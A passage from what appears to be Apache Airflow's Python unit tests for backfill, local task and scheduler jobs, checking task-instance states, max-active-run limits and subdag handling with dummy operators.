end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEquals(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEquals(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEquals(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
